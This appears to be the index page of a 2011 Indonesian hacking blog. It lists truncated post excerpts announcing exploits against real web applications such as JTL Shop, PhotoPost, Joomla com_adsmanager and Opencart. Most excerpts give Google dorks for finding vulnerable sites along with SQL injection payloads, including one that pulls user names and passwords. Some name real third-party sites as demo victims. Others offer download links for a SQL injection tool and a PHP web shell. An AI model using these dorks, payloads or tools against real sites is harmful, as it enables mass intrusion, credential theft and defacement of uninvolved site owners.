CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads Exploit #[~] Author : Mhiman HNc #[~] Home : mhimantrizone.blogspot.com#[~] E-mail : mhiman@hacker-newbie.org And mhiman@indonesiandefacer.org#[~] Found : 06 April 2011.#[~] Version: CMS...
I'm From Indonesia,Gorontalo
Waktu Gorontalo
Daftar Thread
-
▼
2011
(36)
-
▼
April
(20)
- CMS Balitbang 3.42 Fckeditor Arbitrary File Upload...
- dork : allinurl:page_info.php?id_brt= ============...
- JTL Shop 2 Remote SQL Injection Expl...
- IDEA Web Agency (index.php) Blind SQ...
- WEBANDHOST CMS SQL Injection Vulnera...
- SnoGrafx (cat.php) SQL Injection VulnerabilityDork...
- PhotoPost PHP SQL Injection Vulnerability# Date: 2...
- sNews (index.php) SQL Injection Vuln...
- LILDBI Shell Upload Vulnerability# Date: 23.07.201...
- Arquicomp CMS (fns_db.php) SQL Injec...
- [SQL injection vuln] Elite Gaming Ladders v3.5 E...
- ZenPHOTO (Cross Site Scripting in URI) Vulnerabili...
- Site! Prof Edition 2.1 CMS SQL Injec...
- OpenX (phpAdsNew) Remote File inclusion Vulnerabil...
- Joomla com_adsmanager SQli Vulnerability Google d...
- M4x SQL injection tool Download : http://www.zid...
- Php shell devilzc0de[+]author : devilzc0de [+]shel...
- WordPress instal.php vulnerability [+] : Thank's T...
- Opencart remote file Upload Vulnerability #Exploit...
- Sitefinity CMS (ASP.NET) Upload Vulnerability # Ex...
-
▼
April
(20)
About Me
Wednesday, April 13, 2011
dork : allinurl:page_info.php?id_brt=
=============exploit===============
+AND+1=2+UNION+SELECT+1,2,3,4,5,sql c0de,7,8,9,10,11,12,13,14,15,16--
=============Vuln In here===========
http://Target.com/page_info.php?id_brt=70'[your Sql c0de]&id_ktg...
Monday, April 4, 2011
JTL Shop 2 Remote SQL Injection Exploit# Vendor: www.jtl-software.de
# Version: 2
Google dork : inurl:druckansicht.php?s= intitle: JTL-Shop2
POC :
druckansicht.php?s=13 and 1=2 union select 1,2,3,4,5,concat(cName,0x3a,cPass),7,8,9...
IDEA Web Agency (index.php) Blind SQL Injection VulnerabilitPlatform: PHP
CMS Version: All
CMS Download: http://www.ideawebagency.it/
Dork : inurl:/index.php?i=news&id_news=Demo: http://www.schivardi.it/index.php?i=news&id_news=[Blind...
WEBANDHOST CMS SQL Injection Vulnerability# Software Link: http://www.webandhost.de/
# Version: N/A
# Google dork : inurl:"default.php?id=" & intext:"powered by WEBANDHOST"# Platform / Tested on: linux
# Category: webapplications
#...
SnoGrafx (cat.php) SQL Injection VulnerabilityDork : "powered by SnoGrafx"Download Page : http://snografx.com/
Sql Injection POC:
http://localhost/[path]/cat.php?cat=2' (Sql)
Referensi : Inj3ct0r...
PhotoPost PHP SQL Injection Vulnerability# Date: 23/07/2010
# Software Link: www.photopost.com
# Version: 4.0 - 4.6
# Tested on: windows xp pack 3
# CVE : N/A
--------------------------exploit------------------------------
dork : Powered by: PhotoPost...
sNews (index.php) SQL Injection Vulnerability# Software Link: http://snews.awddesign.co.uk
# Version: N/A
# Tested on: Wnidows xp SP2
# CVE : N/A
Dork: "Powered by sNews"===================================================
[+] Vulnerable...
LILDBI Shell Upload Vulnerability# Date: 23.07.2010
# Software Link: http://productos.bvsalud.org/product.php?id=lildbi-web?=en
# Version: 1.2
# Tested on: Ubuntu ( Linux ) - WinXP sp2/sp3
Dork : allinurl:"/lildbi/ POC :
The shell upload page : ...
Arquicomp CMS (fns_db.php) SQL Injection VulnerabilityDate : 17 July 2010
Critical Lvl : High
Impact : Exposure of sensitive information
Where : From Remote
Dork : allinurl:carro.php?id_menu=
[Sofware afected info]
http://www.arquicomp.cl/
http://www.databyte.cl/
[Exploting..demo]...
[SQL injection vuln] Elite Gaming Ladders v3.5
Example :http://www.target.com/[path]/standings.php?ladder[id]=SQLi
Dork : inurl:"/standings.php?ladder"
Victim / POC ::: http://www.esportsligen.de/standings.php?ladder[id]...
ZenPHOTO (Cross Site Scripting in URI) Vulnerability
Vendor: http://www.zenphoto.org/
Date: 2010-05-27
Bug : XSS
Tested on : windows SP2 Franзais V.(Pnx2 2.0)
Dork : Powered by zenPHOTO
POC: http://www.site.com/zenphoto/...
Site! Prof Edition 2.1 CMS SQL Injection Vulnerability
# Product : CMS Site! Professional Edition 2.1
# Vulnerability : SQL Injection
# Dork : inurl:/index.php?node= &lng=
[0x01] SQL Injections :
# POC : http://www.site.com/index.php?node=xxx&lng=x[SQLi]
#...
OpenX (phpAdsNew) Remote File inclusion Vulnerability=====================================================
OpenX (phpAdsNew) Remote File inclusion Vulnerability
=====================================================
# Exploit Title: OpenX (phpAdsNew)...
Joomla com_adsmanager SQli Vulnerability
Google dork : inurl:com_adsmanager
Xploit :
DEMO URL : http://psdemo.joomprod.com/index.php?option=com_adsmanager&page=show_ad&adid=[SQli]&catid=15&Itemi...
Friday, April 1, 2011
M4x SQL injection tool Download : http://www.ziddu.com/download/10838196/m4xmssql.exe.h...
Php shell devilzc0de[+]author : devilzc0de
[+]shell : devilzshell php
[+]decode : indolamer.blogspot.com
[+]version: version 1.31
[+]date : 3, july, 2010
[+]genre : web shell phpDownload : http://www.ziddu.com/download/10853803/jundabshell.txt.htmlThank's...

WordPress instal.php vulnerability [+] : Thank's To : Jundab
[+] : Software Link : www.wordpress.org/latest.zip
[+] : Version : Semua Versi untuk WordPress
[+] : Tasted On : Windows Xp, Puppy Knop fs 5
[+] : Google Dork : inurl:wordpress/wp-admin/install.php?step=1
[+]...
Opencart remote file Upload Vulnerability #Exploit Title: Opencart remote file uploade
#Google dork: [inurl:Powered By OpenCart
#Software Link: http://www.opencart.com/index.php?route=download/download
#Platform :linux/php
##################MagelangCyber################
#...
Sitefinity CMS (ASP.NET) Upload Vulnerability # Exploit Title: Sitefinity CMS (ASP.NET) Upload Vulnerability
# DDate: 16/11/2010
# Author: Net.Edit0r
# Software Link: www.sitefinity.com
# Version: 3.x . 4.0
# Tested on: windows SP2 Francais V.(Pnx2...
Subscribe to:
Posts (Atom)
CoinUrl
Komentar
Total Pageviews
My Facebook
Blog Archive
-
▼
2011
(36)
-
▼
April
(20)
- CMS Balitbang 3.42 Fckeditor Arbitrary File Upload...
- dork : allinurl:page_info.php?id_brt= ============...
- JTL Shop 2 Remote SQL Injection Expl...
- IDEA Web Agency (index.php) Blind SQ...
- WEBANDHOST CMS SQL Injection Vulnera...
- SnoGrafx (cat.php) SQL Injection VulnerabilityDork...
- PhotoPost PHP SQL Injection Vulnerability# Date: 2...
- sNews (index.php) SQL Injection Vuln...
- LILDBI Shell Upload Vulnerability# Date: 23.07.201...
- Arquicomp CMS (fns_db.php) SQL Injec...
- [SQL injection vuln] Elite Gaming Ladders v3.5 E...
- ZenPHOTO (Cross Site Scripting in URI) Vulnerabili...
- Site! Prof Edition 2.1 CMS SQL Injec...
- OpenX (phpAdsNew) Remote File inclusion Vulnerabil...
- Joomla com_adsmanager SQli Vulnerability Google d...
- M4x SQL injection tool Download : http://www.zid...
- Php shell devilzc0de[+]author : devilzc0de [+]shel...
- WordPress instal.php vulnerability [+] : Thank's T...
- Opencart remote file Upload Vulnerability #Exploit...
- Sitefinity CMS (ASP.NET) Upload Vulnerability # Ex...
-
▼
April
(20)